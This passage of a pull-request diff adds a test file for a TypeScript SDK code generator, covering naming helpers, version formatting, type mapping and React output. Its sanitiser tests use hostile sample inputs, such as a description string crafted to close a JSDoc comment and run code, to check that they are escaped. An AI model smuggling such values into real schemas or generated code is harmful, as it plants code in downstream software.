### PR TITLE
[REA-1581][3/6] feat: codegen emitter + injection defence

### DIFF
--- a/packages/codegen/__tests__/emitter.test.ts
+++ b/packages/codegen/__tests__/emitter.test.ts
@@ -1,0 +1,1288 @@
+// Copyright (c) 2026 Reactor Technologies, Inc. All rights reserved.
+
+import { describe, expect, it } from "vitest";
+
+import { generateModelSdk } from "../src/codegen.js";
+import { __testing__ } from "../src/emitter.js";
+import type {
+  EventSchema,
+  FieldSchema,
+  MessageSchema,
+  ModelSchema,
+  TrackSchema,
+} from "../src/types.js";
+
+const {
+  toPascalCase,
+  toCamelCase,
+  fieldSchemaToTsType,
+  isUploadReference,
+  generateParamInterface,
+  generateMessageInterface,
+  generateMessageUnion,
+  generateTrackConstants,
+  stripBuildMetadata,
+  formatVersionForHeader,
+  formatVersionForPackageJson,
+  formatVersionForModelConstant,
+  sanitizeJsDocLine,
+  enumValueToTs,
+} = __testing__;
+
+// ---------------------------------------------------------------------------
+// Case helpers
+// ---------------------------------------------------------------------------
+
+describe("case helpers", () => {
+  it("converts snake_case to PascalCase", () => {
+    expect(toPascalCase("set_prompt")).toBe("SetPrompt");
+    expect(toPascalCase("helios")).toBe("Helios");
+    expect(toPascalCase("a_b_c_d")).toBe("ABCD");
+  });
+
+  it("converts snake_case to camelCase", () => {
+    expect(toCamelCase("set_prompt")).toBe("setPrompt");
+    expect(toCamelCase("start")).toBe("start");
+    expect(toCamelCase("schedule_prompt")).toBe("schedulePrompt");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Injection-defence helpers.
+//
+// `parseSchema` validates names and enum members, but field/message/event
+// descriptions pass through as free-form prose — they can legitimately
+// contain any characters. These helpers are the last line of defence that
+// keeps schema input from escaping its intended sink in the emitted
+// TypeScript (string literal, JSDoc body).
+// ---------------------------------------------------------------------------
+
+describe("sanitizeJsDocLine", () => {
+  it("escapes a literal `*/` so it can't terminate a JSDoc comment", () => {
+    // If this got through unescaped, an author-written description like
+    // `"accepted. */ evil()"` would close the `/** … */` comment and
+    // turn the rest of the line into module-scope code.
+    expect(sanitizeJsDocLine("accepted. */ evil()")).toBe(
+      "accepted. *\\/ evil()",
+    );
+  });
+
+  it("collapses newline families so a line can't smuggle a trailing `\\n`", () => {
+    // `\r`, `\n`, U+2028, U+2029 all break JS source into a new line
+    // when an injected comment escape hands them to the parser. Flatten
+    // them to a single space so the caller's line-based formatting is
+    // preserved and no sneaky line break lands in the output.
+    expect(sanitizeJsDocLine("line1\nline2")).toBe("line1 line2");
+    expect(sanitizeJsDocLine("a\r\nb")).toBe("a b");
+    expect(sanitizeJsDocLine("a\u2028b")).toBe("a b");
+    expect(sanitizeJsDocLine("a\u2029b")).toBe("a b");
+  });
+
+  it("leaves plain prose untouched", () => {
+    expect(sanitizeJsDocLine("Set and encode the scene prompt.")).toBe(
+      "Set and encode the scene prompt.",
+    );
+  });
+});
+
+describe("enumValueToTs", () => {
+  it("escapes quotes and backslashes in string enums via JSON.stringify", () => {
+    // The emitter drops this value directly into a union literal. An
+    // unescaped `"` would terminate the string and the rest would be
+    // interpreted as TS at compile — and, worse, emitted verbatim into
+    // the bundle at runtime if the TS compiler's error is squelched.
+    expect(enumValueToTs('a"b')).toBe('"a\\"b"');
+    expect(enumValueToTs("back\\slash")).toBe('"back\\\\slash"');
+  });
+
+  it("serialises numbers and booleans as their JS literal form", () => {
+    expect(enumValueToTs(42)).toBe("42");
+    expect(enumValueToTs(true)).toBe("true");
+  });
+
+  it("leaves well-formed string enum values readable", () => {
+    expect(enumValueToTs("2x")).toBe('"2x"');
+  });
+});
+
+describe("stripBuildMetadata", () => {
+  it("drops Reactor's -g<sha> git-describe suffix", () => {
+    expect(stripBuildMetadata("v0.8.3-g404f6950")).toBe("v0.8.3");
+    expect(stripBuildMetadata("0.8.3-g404f6950")).toBe("0.8.3");
+    expect(stripBuildMetadata("v1.2.3-gabcdef")).toBe("v1.2.3");
+    // Full-length SHAs should also be stripped — we don't pin the hex
+    // length, just require it to be non-empty.
+    expect(stripBuildMetadata("v1.0.0-gdeadbeefcafebabe")).toBe("v1.0.0");
+  });
+
+  it("leaves plain semver (with or without v) untouched", () => {
+    expect(stripBuildMetadata("1.0.0")).toBe("1.0.0");
+    expect(stripBuildMetadata("v0.0.0")).toBe("v0.0.0");
+    expect(stripBuildMetadata("2.9.1")).toBe("2.9.1");
+  });
+
+  it("leaves non-Reactor pre-release / build-metadata suffixes alone", () => {
+    // `-beta.3` is a legitimate semver pre-release; the strip regex is
+    // narrow enough to ignore it.
+    expect(stripBuildMetadata("v1.2.3-beta.3")).toBe("v1.2.3-beta.3");
+    expect(stripBuildMetadata("v1.2.3-rc.1")).toBe("v1.2.3-rc.1");
+    // Only a trailing `-g<hex>` is special. A `-g` followed by
+    // non-hex characters isn't a git-describe suffix and stays put.
+    expect(stripBuildMetadata("v1.2.3-ghostly")).toBe("v1.2.3-ghostly");
+    expect(stripBuildMetadata("v1.2.3-general.1")).toBe("v1.2.3-general.1");
+  });
+});
+
+describe("formatVersionForHeader", () => {
+  it("adds a v prefix to an unprefixed version", () => {
+    expect(formatVersionForHeader("1.0.0")).toBe("v1.0.0");
+    expect(formatVersionForHeader("0.0.0")).toBe("v0.0.0");
+    expect(formatVersionForHeader("2.9.1-beta.3")).toBe("v2.9.1-beta.3");
+  });
+
+  it("does not double-prefix an already-prefixed version", () => {
+    expect(formatVersionForHeader("v0.0.0")).toBe("v0.0.0");
+    expect(formatVersionForHeader("v1.2.3")).toBe("v1.2.3");
+  });
+
+  it("drops the -g<sha> git-describe suffix so humans see just the semver", () => {
+    expect(formatVersionForHeader("v0.8.3-g404f6950")).toBe("v0.8.3");
+    expect(formatVersionForHeader("0.8.3-g404f6950")).toBe("v0.8.3");
+  });
+});
+
+describe("formatVersionForPackageJson", () => {
+  it("strips a single leading v so npm semver validation passes", () => {
+    expect(formatVersionForPackageJson("v0.0.0")).toBe("0.0.0");
+    expect(formatVersionForPackageJson("v1.2.3")).toBe("1.2.3");
+    expect(formatVersionForPackageJson("v2.9.1-beta.3")).toBe("2.9.1-beta.3");
+  });
+
+  it("leaves a plain semver untouched", () => {
+    expect(formatVersionForPackageJson("1.0.0")).toBe("1.0.0");
+    expect(formatVersionForPackageJson("0.0.0")).toBe("0.0.0");
+    expect(formatVersionForPackageJson("2.9.1-beta.3")).toBe("2.9.1-beta.3");
+  });
+
+  it("drops -g<sha> so the published tarball / npm version is stable across rebuilds", () => {
+    expect(formatVersionForPackageJson("v0.8.3-g404f6950")).toBe("0.8.3");
+    expect(formatVersionForPackageJson("0.8.3-g404f6950")).toBe("0.8.3");
+  });
+});
+
+describe("formatVersionForModelConstant", () => {
+  it("drops -g<sha> but preserves any leading v authored by the schema", () => {
+    expect(formatVersionForModelConstant("v0.8.3-g404f6950")).toBe("v0.8.3");
+    expect(formatVersionForModelConstant("0.8.3-g404f6950")).toBe("0.8.3");
+    expect(formatVersionForModelConstant("v0.0.0")).toBe("v0.0.0");
+    expect(formatVersionForModelConstant("1.2.3")).toBe("1.2.3");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// fieldSchemaToTsType — primitive / enum / upload / fallback
+// ---------------------------------------------------------------------------
+
+function field(overrides: Partial<FieldSchema>): FieldSchema {
+  return { type: "unknown", ...overrides };
+}
+
+describe("fieldSchemaToTsType", () => {
+  it("maps JSON Schema primitives to TypeScript primitives", () => {
+    expect(fieldSchemaToTsType(field({ type: "string" }))).toBe("string");
+    expect(fieldSchemaToTsType(field({ type: "integer" }))).toBe("number");
+    expect(fieldSchemaToTsType(field({ type: "number" }))).toBe("number");
+    expect(fieldSchemaToTsType(field({ type: "boolean" }))).toBe("boolean");
+  });
+
+  it("maps `object` (no format) to Record<string, unknown>", () => {
+    expect(fieldSchemaToTsType(field({ type: "object" }))).toBe(
+      "Record<string, unknown>",
+    );
+  });
+
+  it("maps `array` to unknown[]", () => {
+    expect(fieldSchemaToTsType(field({ type: "array" }))).toBe("unknown[]");
+  });
+
+  it("maps unknown types to `unknown`", () => {
+    expect(fieldSchemaToTsType(field({ type: "weird" }))).toBe("unknown");
+  });
+
+  it("emits a literal union for enum fields", () => {
+    expect(
+      fieldSchemaToTsType(field({ type: "string", enum: ["1x", "2x", "4x"] })),
+    ).toBe('"1x" | "2x" | "4x"');
+  });
+
+  it("emits FileRef for upload-reference object fields", () => {
+    expect(
+      fieldSchemaToTsType(
+        field({ type: "object", format: "reactor-upload-reference" }),
+      ),
+    ).toBe("FileRef");
+
+    // The legacy `file-reference` format is also supported.
+    expect(
+      fieldSchemaToTsType(field({ type: "object", format: "file-reference" })),
+    ).toBe("FileRef");
+  });
+
+  it("does not treat object fields with other formats as upload refs", () => {
+    expect(
+      fieldSchemaToTsType(field({ type: "object", format: "date-time" })),
+    ).toBe("Record<string, unknown>");
+  });
+});
+
+describe("isUploadReference", () => {
+  it("accepts the canonical and legacy format names", () => {
+    expect(
+      isUploadReference(
+        field({ type: "object", format: "reactor-upload-reference" }),
+      ),
+    ).toBe(true);
+    expect(
+      isUploadReference(field({ type: "object", format: "file-reference" })),
+    ).toBe(true);
+  });
+
+  it("rejects non-object fields and unknown formats", () => {
+    expect(
+      isUploadReference(
+        field({ type: "string", format: "reactor-upload-reference" }),
+      ),
+    ).toBe(false);
+    expect(isUploadReference(field({ type: "object" }))).toBe(false);
+    expect(
+      isUploadReference(field({ type: "object", format: "something-else" })),
+    ).toBe(false);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// generateParamInterface
+// ---------------------------------------------------------------------------
+
+describe("generateParamInterface", () => {
+  it("emits nothing when the event has no fields", () => {
+    const event: EventSchema = {
+      name: "start",
+      description: "Begin",
+      fields: {},
+    };
+    expect(generateParamInterface("Helios", event)).toBe("");
+  });
+
+  it("marks fields with defaults as optional and annotates JSDoc", () => {
+    const event: EventSchema = {
+      name: "set_prompt",
+      description: "Set prompt",
+      fields: {
+        prompt: {
+          type: "string",
+          description: "Prompt text",
+          default: "",
+        },
+      },
+    };
+
+    const out = generateParamInterface("Helios", event);
+
+    expect(out).toContain("export interface HeliosSetPromptParams {");
+    expect(out).toContain("Prompt text");
+    expect(out).toContain('@default ""');
+    expect(out).toContain("prompt?: string;");
+  });
+
+  it("emits required (non-optional) fields when no default is present", () => {
+    const event: EventSchema = {
+      name: "focus",
+      description: "",
+      fields: { target: { type: "string" } },
+    };
+
+    const out = generateParamInterface("Helios", event);
+    expect(out).toContain("target: string;");
+    expect(out).not.toContain("target?:");
+  });
+
+  it("renders numeric constraints as JSDoc tags", () => {
+    const event: EventSchema = {
+      name: "configure",
+      description: "",
+      fields: {
+        strength: { type: "number", minimum: 0, maximum: 1, default: 1 },
+      },
+    };
+
+    const out = generateParamInterface("Helios", event);
+    expect(out).toContain("@minimum 0");
+    expect(out).toContain("@maximum 1");
+    expect(out).toContain("@default 1");
+    expect(out).toContain("strength?: number;");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// generateMessageInterface + union
+// ---------------------------------------------------------------------------
+
+describe("generateMessageInterface", () => {
+  it("emits a discriminator and each declared field", () => {
+    const msg: MessageSchema = {
+      name: "chunk_complete",
+      description: "A chunk finished.",
+      fields: {
+        chunk_index: { type: "integer" },
+        frames_emitted: { type: "integer" },
+      },
+    };
+
+    const out = generateMessageInterface("Helios", msg);
+
+    expect(out).toContain("export interface HeliosChunkCompleteMessage {");
+    expect(out).toContain('type: "chunk_complete";');
+    expect(out).toContain("chunk_index: number;");
+    expect(out).toContain("frames_emitted: number;");
+  });
+});
+
+describe("generateMessageUnion", () => {
+  it("returns an empty string when there are no messages", () => {
+    expect(generateMessageUnion("Helios", [])).toBe("");
+  });
+
+  it("builds a discriminated union across all messages", () => {
+    const messages: MessageSchema[] = [
+      { name: "prompt_accepted", description: "", fields: {} },
+      { name: "chunk_complete", description: "", fields: {} },
+    ];
+
+    const out = generateMessageUnion("Helios", messages);
+    expect(out).toContain("export type HeliosMessage =");
+    expect(out).toContain("| HeliosPromptAcceptedMessage");
+    expect(out).toContain("| HeliosChunkCompleteMessage");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// generateTrackConstants
+// ---------------------------------------------------------------------------
+
+describe("generateTrackConstants", () => {
+  it("returns an empty string when the model declares no tracks", () => {
+    expect(generateTrackConstants("Helios", [])).toBe("");
+  });
+
+  it("emits an `as const` object keyed by uppercased track name", () => {
+    const tracks: TrackSchema[] = [
+      { name: "main_video", kind: "video", direction: "out" },
+    ];
+    const out = generateTrackConstants("Helios", tracks);
+
+    expect(out).toContain("export const HeliosTracks = {");
+    expect(out).toContain(
+      'MAIN_VIDEO: { name: "main_video", kind: "video", direction: "out" },',
+    );
+    expect(out).toContain("} as const;");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Shared fixture: a minimal ModelSchema the describe blocks below extend.
+// ---------------------------------------------------------------------------
+
+function schema(overrides: Partial<ModelSchema> = {}): ModelSchema {
+  return {
+    modelName: "helios",
+    modelVersion: "0.1.0",
+    events: [],
+    messages: [],
+    tracks: [],
+    ...overrides,
+  };
+}
+
+// ---------------------------------------------------------------------------
+// generateModelSdk — end-to-end shape checks (not snapshots)
+// ---------------------------------------------------------------------------
+
+describe("generateModelSdk", () => {
+  it("produces exactly four files at the expected paths", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema(),
+      outputDir: "/tmp/ignored",
+    });
+
+    expect(pkg.files.map((f) => f.path).sort()).toEqual([
+      "README.md",
+      "package.json",
+      "src/index.ts",
+      "tsconfig.json",
+      "tsup.config.ts",
+    ]);
+  });
+
+  it("pins the SDK version in the generated package.json dependencies", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema(),
+      outputDir: "/tmp/ignored",
+    });
+
+    const pkgJson = pkg.files.find((f) => f.path === "package.json")!;
+    const parsed = JSON.parse(pkgJson.content);
+    expect(parsed.name).toBe("@reactor-models/helios");
+    expect(parsed.version).toBe("0.1.0");
+    expect(parsed.dependencies["@reactor-team/js-sdk"]).toBe("^2.9.1");
+  });
+
+  it("imports FileRef only when an event has an upload-reference field", () => {
+    const withUpload = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema({
+        events: [
+          {
+            name: "set_image",
+            description: "",
+            fields: {
+              image: { type: "object", format: "reactor-upload-reference" },
+            },
+          },
+        ],
+      }),
+      outputDir: "/tmp/ignored",
+    });
+    const withoutUpload = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema(),
+      outputDir: "/tmp/ignored",
+    });
+
+    const withSrc = withUpload.files.find((f) => f.path === "src/index.ts")!;
+    const withoutSrc = withoutUpload.files.find(
+      (f) => f.path === "src/index.ts",
+    )!;
+
+    expect(withSrc.content).toContain(
+      'import { Reactor, FileRef } from "@reactor-team/js-sdk";',
+    );
+    expect(withSrc.content).toContain("async uploadFile(");
+    // Re-export FileRef so consumers can type `const ref: FileRef = ...`
+    // without pulling in a second import from `@reactor-team/js-sdk`.
+    expect(withSrc.content).toContain("export { FileRef };");
+    expect(withoutSrc.content).toContain(
+      'import { Reactor } from "@reactor-team/js-sdk";',
+    );
+    expect(withoutSrc.content).not.toContain("async uploadFile(");
+    // And without any upload-reference event there's nothing to type,
+    // so the re-export must stay absent too — no dead surface shipped.
+    expect(withoutSrc.content).not.toContain("FileRef");
+  });
+
+  it("generates typed per-event methods with camelCase names", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema({
+        events: [
+          {
+            name: "schedule_prompt",
+            description: "",
+            fields: { prompt: { type: "string", default: "" } },
+          },
+          { name: "start", description: "", fields: {} },
+        ],
+      }),
+      outputDir: "/tmp/ignored",
+    });
+
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+    expect(src).toContain(
+      "async schedulePrompt(params: HeliosSchedulePromptParams)",
+    );
+    expect(src).toContain(
+      'await this.reactor.sendCommand("schedule_prompt", params);',
+    );
+    expect(src).toContain("async start():");
+    expect(src).toContain('await this.reactor.sendCommand("start", {});');
+  });
+
+  it("wires per-message listener helpers onto the discriminated union", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema({
+        messages: [
+          { name: "prompt_accepted", description: "", fields: {} },
+          { name: "chunk_complete", description: "", fields: {} },
+        ],
+      }),
+      outputDir: "/tmp/ignored",
+    });
+
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+    expect(src).toContain(
+      "onMessage(handler: (message: HeliosMessage) => void)",
+    );
+    expect(src).toContain("onPromptAccepted(handler:");
+    expect(src).toContain("onChunkComplete(handler:");
+    expect(src).toContain('if (msg.type === "prompt_accepted")');
+  });
+
+  it("does not double-prefix the version in the generated header (v-prefixed schema)", () => {
+    // Regression test: OpenAPI schemas that already write `"version": "v0.0.0"`
+    // used to produce `// Model: <name> vv0.0.0` in the header. The header
+    // must only have a single leading v. `MODEL_VERSION` preserves the
+    // author's leading `v` here because there's no `-g<sha>` suffix to
+    // strip.
+    const pkg = generateModelSdk({
+      modelName: "waypoint",
+      modelVersion: "v0.0.0",
+      sdkVersion: "2.9.1",
+      schema: schema({ modelName: "waypoint", modelVersion: "v0.0.0" }),
+      outputDir: "/tmp/ignored",
+    });
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+    expect(src).toContain("// Model: waypoint v0.0.0");
+    expect(src).not.toContain("vv0.0.0");
+    expect(src).toContain('export const MODEL_VERSION = "v0.0.0" as const;');
+  });
+
+  it("adds a leading v in the header when the schema version is bare", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "1.2.3",
+      sdkVersion: "2.9.1",
+      schema: schema({ modelVersion: "1.2.3" }),
+      outputDir: "/tmp/ignored",
+    });
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+    expect(src).toContain("// Model: helios v1.2.3");
+    expect(src).toContain('export const MODEL_VERSION = "1.2.3" as const;');
+  });
+
+  it("strips a leading v from the generated package.json version (npm compat)", () => {
+    // npm rejects any version that starts with `v` — a common habit in
+    // model release tags (`info.version: "v0.0.0"`). The package.json
+    // `"version"` must be strict semver; `MODEL_VERSION` preserves the
+    // author's leading `v` (it's for display, not for npm).
+    const pkg = generateModelSdk({
+      modelName: "waypoint",
+      modelVersion: "v0.0.0",
+      sdkVersion: "2.9.1",
+      schema: schema({ modelName: "waypoint", modelVersion: "v0.0.0" }),
+      outputDir: "/tmp/ignored",
+    });
+    const pkgJson = JSON.parse(
+      pkg.files.find((f) => f.path === "package.json")!.content,
+    );
+    expect(pkgJson.version).toBe("0.0.0");
+
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+    expect(src).toContain('export const MODEL_VERSION = "v0.0.0" as const;');
+  });
+
+  it("leaves a plain-semver package.json version untouched", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "1.2.3",
+      sdkVersion: "2.9.1",
+      schema: schema({ modelVersion: "1.2.3" }),
+      outputDir: "/tmp/ignored",
+    });
+    const pkgJson = JSON.parse(
+      pkg.files.find((f) => f.path === "package.json")!.content,
+    );
+    expect(pkgJson.version).toBe("1.2.3");
+  });
+
+  it("strips the -g<sha> git-describe suffix from every emitted surface", () => {
+    // End-to-end proof that a typical Reactor release tag
+    // (`v<semver>-g<shortsha>`) flows through the generator without
+    // leaking the SHA into anything a consumer reads: the header
+    // banner, the exported MODEL_VERSION constant, the package.json
+    // `version` field (which also drives the tarball name emitted by
+    // `npm pack`), and the README front-matter callout all normalise
+    // on `v0.8.3` / `0.8.3`. This is the invariant the models-sync
+    // pipeline relies on to avoid publishing a differently-named
+    // artefact every time the short SHA changes without the semver
+    // triple moving.
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "v0.8.3-g404f6950",
+      sdkVersion: "2.9.1",
+      schema: schema({ modelName: "helios", modelVersion: "v0.8.3-g404f6950" }),
+      outputDir: "/tmp/ignored",
+    });
+
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+    expect(src).toContain("// Model: helios v0.8.3");
+    expect(src).not.toContain("g404f6950");
+    expect(src).toContain('export const MODEL_VERSION = "v0.8.3" as const;');
+
+    const pkgJson = JSON.parse(
+      pkg.files.find((f) => f.path === "package.json")!.content,
+    );
+    expect(pkgJson.version).toBe("0.8.3");
+
+    const readme = pkg.files.find((f) => f.path === "README.md")!.content;
+    expect(readme).not.toContain("g404f6950");
+    expect(readme).toContain("Version **v0.8.3**");
+  });
+
+  it("is deterministic for a given input (same output twice)", () => {
+    const opts = {
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema({
+        events: [{ name: "start", description: "", fields: {} }],
+        tracks: [{ name: "main", kind: "video", direction: "out" } as const],
+      }),
+      outputDir: "/tmp/ignored",
+    };
+    const a = generateModelSdk(opts);
+    const b = generateModelSdk(opts);
+    expect(a).toEqual(b);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// React emission (opt-in via CodegenOptions.react)
+// ---------------------------------------------------------------------------
+
+describe("React emission — off by default", () => {
+  it("emits no React artefacts of any kind", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema(),
+      outputDir: "/tmp/ignored",
+    });
+    // No sibling React file, and no re-export hook in the main file.
+    expect(pkg.files.find((f) => f.path === "src/react.ts")).toBeUndefined();
+    const src = pkg.files.find((f) => f.path === "src/index.ts")!.content;
+    expect(src).not.toContain('"use client";');
+    expect(src).not.toContain('from "react"');
+    expect(src).not.toContain("ReactorProvider");
+    expect(src).not.toContain('export * from "./react.js"');
+  });
+
+  it("package.json exports only the package root", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema(),
+      outputDir: "/tmp/ignored",
+    });
+    const pkgJson = JSON.parse(
+      pkg.files.find((f) => f.path === "package.json")!.content,
+    );
+    expect(pkgJson.exports).toEqual({
+      ".": {
+        types: "./dist/index.d.ts",
+        import: "./dist/index.mjs",
+        require: "./dist/index.js",
+      },
+    });
+    expect(pkgJson.peerDependencies).toBeUndefined();
+  });
+
+  it("tsup entry list has a single entry", () => {
+    const pkg = generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema(),
+      outputDir: "/tmp/ignored",
+    });
+    const tsup = pkg.files.find((f) => f.path === "tsup.config.ts")!.content;
+    expect(tsup).toContain('entry: ["src/index.ts"]');
+    expect(tsup).not.toContain("src/react.ts");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// React emission — on via `react: true`
+//
+// `src/react.ts` ships as a sibling of `src/index.ts`; the main file
+// re-exports everything from it so the public surface stays a single
+// root import. Package.json only exposes `.` — no `/react` subpath.
+// ---------------------------------------------------------------------------
+
+describe("React emission — on via react: true", () => {
+  function reactPkg(overrides?: Partial<ModelSchema>) {
+    return generateModelSdk({
+      modelName: "helios",
+      modelVersion: "0.1.0",
+      sdkVersion: "2.9.1",
+      schema: schema(overrides),
+      outputDir: "/tmp/ignored",
+      react: true,
+    });
+  }
+
+  function reactSource(overrides?: Partial<ModelSchema>): string {
+    return reactPkg(overrides).files.find((f) => f.path === "src/react.ts")!
+      .content;
+  }
+
+  function indexSource(overrides?: Partial<ModelSchema>): string {
+    return reactPkg(overrides).files.find((f) => f.path === "src/index.ts")!
+      .content;
+  }
+
+  it("emits src/react.ts with the usual header + use-client directive", () => {
+    const pkg = reactPkg();
+    const react = pkg.files.find((f) => f.path === "src/react.ts");
+    expect(react).toBeDefined();
+    expect(react!.content).toContain('"use client";');
+    expect(react!.content).toContain(
+      "// Auto-generated by @reactor-team/codegen — DO NOT EDIT",
+    );
+  });
+
+  it("re-exports everything from ./react.js at the bottom of src/index.ts", () => {
+    const src = indexSource();
+    expect(src).toContain('export * from "./react.js";');
+    // The re-export must appear *after* every value declaration — the
+    // circular `react.ts → index.ts` imports (MODEL_NAME, tracks, …)
+    // depend on those bindings being initialised first.
+    const reExportIdx = src.indexOf('export * from "./react.js";');
+    const classIdx = src.indexOf("export class HeliosModel");
+    expect(classIdx).toBeGreaterThan(-1);
+    expect(reExportIdx).toBeGreaterThan(classIdx);
+  });
+
+  it("puts a single use-client directive at the top of src/index.ts", () => {
+    const src = indexSource();
+    // Directive must sit in the module prologue, before any imports,
+    // or React/Next.js will ignore it.
+    const directiveIdx = src.indexOf('"use client";');
+    const firstImportIdx = src.indexOf("import ");
+    expect(directiveIdx).toBeGreaterThan(-1);
+    expect(firstImportIdx).toBeGreaterThan(directiveIdx);
+    expect(src.split('"use client";').length - 1).toBe(1);
+  });
+
+  it("src/react.ts uses createElement (never JSX, so file can stay .ts)", () => {
+    const react = reactSource();
+    expect(react).toContain("createElement(");
+    // No JSX angle brackets in the emitted component bodies.
+    expect(react).not.toMatch(/return\s+</);
+  });
+
+  it("emits a <Prefix>Provider that bakes in modelName and modelTracks", () => {
+    const react = reactSource({
+      tracks: [{ name: "main", kind: "video", direction: "out" }],
+    });
+    expect(react).toContain("export function HeliosProvider(");
+    expect(react).toContain("modelName: MODEL_NAME");
+    expect(react).toContain("modelTracks: [...HeliosTracks]");
+  });
+
+  it("Provider omits modelTracks for schemas without tracks", () => {
+    const react = reactSource({ tracks: [] });
+    expect(react).toContain("export function HeliosProvider(");
+    expect(react).not.toContain("modelTracks");
+  });
+
+  it("emits a useHelios() hook with a typed method per event", () => {
+    const react = reactSource({
+      events: [
+        {
+          name: "set_prompt",
+          description: "",
+          fields: { prompt: { type: "string", default: "" } },
+        },
+        { name: "start", description: "", fields: {} },
+      ],
+    });
+
+    expect(react).toContain("export function useHelios()");
+    expect(react).toContain(
+      "const sendCommand = useReactor((s) => s.sendCommand);",
+    );
+    expect(react).toContain(
+      "setPrompt: (params: HeliosSetPromptParams): Promise<void>",
+    );
+    expect(react).toContain('sendCommand("set_prompt", params)');
+    expect(react).toContain("start: (): Promise<void>");
+    expect(react).toContain('sendCommand("start", {})');
+    expect(react).toContain("status,");
+  });
+
+  it("exposes connect + disconnect on useHelios() so consumers don't need @reactor-team/js-sdk directly", () => {
+    // Regression: the hand-rolled React layer in reactor-experiments had
+    // to import `useReactor` from `@reactor-team/js-sdk` just to select
+    // `s.connect` / `s.disconnect` (promoting the SDK from transitive to
+    // direct dep in the host project). The generated `useHelios()` hook
+    // must expose both so the typed binding is genuinely self-contained.
+    const react = reactSource({
+      events: [{ name: "start", description: "", fields: {} }],
+    });
+
+    expect(react).toContain("const connect = useReactor((s) => s.connect);");
+    expect(react).toContain(
+      "const disconnect = useReactor((s) => s.disconnect);",
+    );
+    // Both must land in the returned object, not just be selected and
+    // dropped — it's the return shape that matters to consumers.
+    expect(react).toMatch(/return\s*\{[\s\S]*\bconnect,[\s\S]*\}/);
+    expect(react).toMatch(/return\s*\{[\s\S]*\bdisconnect,[\s\S]*\}/);
+  });
+
+  it("exposes uploadFile only when events use upload references", () => {
+    const withUpload = reactSource({
+      events: [
+        {
+          name: "set_image",
+          description: "",
+          fields: {
+            image: { type: "object", format: "reactor-upload-reference" },
+          },
+        },
+      ],
+    });
+    const withoutUpload = reactSource({
+      events: [{ name: "start", description: "", fields: {} }],
+    });
+
+    expect(withUpload).toContain(
+      "const uploadFile = useReactor((s) => s.uploadFile);",
+    );
+    expect(withUpload).toContain("uploadFile: (");
+    expect(withUpload).toContain("type FileRef");
+    expect(withoutUpload).not.toContain("s.uploadFile");
+    expect(withoutUpload).not.toContain("type FileRef");
+  });
+
+  it("emits one typed hook per message plus a catch-all useHeliosMessage", () => {
+    const react = reactSource({
+      messages: [
+        { name: "prompt_accepted", description: "", fields: {} },
+        { name: "chunk_complete", description: "", fields: {} },
+      ],
+    });
+
+    expect(react).toContain(
+      "export function useHeliosMessage(\n  handler: (message: HeliosMessage) => void",
+    );
+    expect(react).toContain(
+      "export function useHeliosPromptAccepted(\n  handler: (message: HeliosPromptAcceptedMessage) => void",
+    );
+    expect(react).toContain(
+      "export function useHeliosChunkComplete(\n  handler: (message: HeliosChunkCompleteMessage) => void",
+    );
+    // Per-message hooks unwrap the `{ type, data, uploads? }` envelope
+    // before running the discriminator check so `msg.<field>` matches
+    // the flat shape the typed interfaces promise (REA-1581 follow-up).
+    expect(react).toContain("const m = _unwrapMessage<HeliosMessage>(msg);");
+    expect(react).toContain('if (m.type === "prompt_accepted") {');
+    expect(react).toContain('if (m.type === "chunk_complete") {');
+  });
+
+  it("does not import useReactorMessage when the schema has no messages", () => {
+    const react = reactSource({ messages: [] });
+    expect(react).not.toContain("useReactorMessage");
+    expect(react).not.toContain("useHeliosMessage(");
+  });
+
+  it("src/react.ts pulls generated constants and types from ./index.js", () => {
+    const react = reactSource({
+      events: [{ name: "set_prompt", description: "", fields: {} }],
+      messages: [{ name: "prompt_accepted", description: "", fields: {} }],
+      tracks: [{ name: "main", kind: "video", direction: "out" }],
+    });
+    expect(react).toContain('} from "./index.js";');
+    expect(react).toContain("MODEL_NAME");
+    expect(react).toContain("HeliosTracks");
+    expect(react).toContain("type HeliosOptions");
+    expect(react).toContain("type HeliosMessage");
+  });
+
+  it("package.json exposes a single root entry + declares react peer dep + hook keywords", () => {
+    const pkg = reactPkg();
+    const pkgJson = JSON.parse(
+      pkg.files.find((f) => f.path === "package.json")!.content,
+    );
+
+    // Only the root export — the `./react` subpath is intentionally
